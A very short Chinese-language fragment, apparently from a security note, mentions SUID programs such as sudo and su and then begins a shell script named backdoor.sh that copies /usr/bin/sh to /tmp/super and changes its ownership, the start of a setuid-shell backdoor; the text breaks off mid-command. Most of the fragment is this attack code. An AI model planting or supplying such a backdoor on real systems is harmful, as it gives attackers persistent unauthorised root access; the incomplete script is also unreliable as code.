系统原程序:sudo、su、。。。这些具有suid标志的程序

后门脚本backdoor.sh

#!/usr/bin/sh

cp /usr/bin/sh /tmp/super

(chown `whoami`:`whoami` /tmp/super 2>/dev/null;ch......